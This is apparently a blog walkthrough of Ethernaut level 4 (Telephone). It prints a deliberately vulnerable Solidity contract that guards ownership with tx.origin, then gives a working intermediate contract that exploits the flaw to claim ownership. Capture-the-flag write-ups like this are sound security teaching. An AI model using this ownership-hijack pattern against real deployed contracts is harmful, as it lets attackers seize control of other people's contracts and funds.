This is the level 4 of Ethernaut game.
Pre-requisites
Hack
Given contract:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Telephone {
address public owner;
constructor() public {
owner = msg.sender;
}
function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
}
}
}
player has to claim this contract's ownership.
Simple one. We'll make an intermediate contract (named IntermediateContract) with the same method changeOwner (or anything else -- name doesn't matter) on Remix. IntermediateContract's changeOwner will simply call Telephone contract's changeOwner.
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
interface ITelephone {
function changeOwner(address _owner) external;
}
contract IntermediateContract {
function changeOwner(address _addr) public {
ITelephone(_addr).changeOwner(msg.sender);
}
}
player will call IntermediateContract contract's changeOwner, which in turn will call Telephone's changeOwner with msg.sender (which is player) as param. In that case tx.origin is player and msg.sender is IntermediateContract's address. And since now tx.origin != msg.sender, player has claimed the ownership.
Done.
Learned something awesome? Consider starring the github repo 😄
and following me on twitter here 🙏
Top comments (0)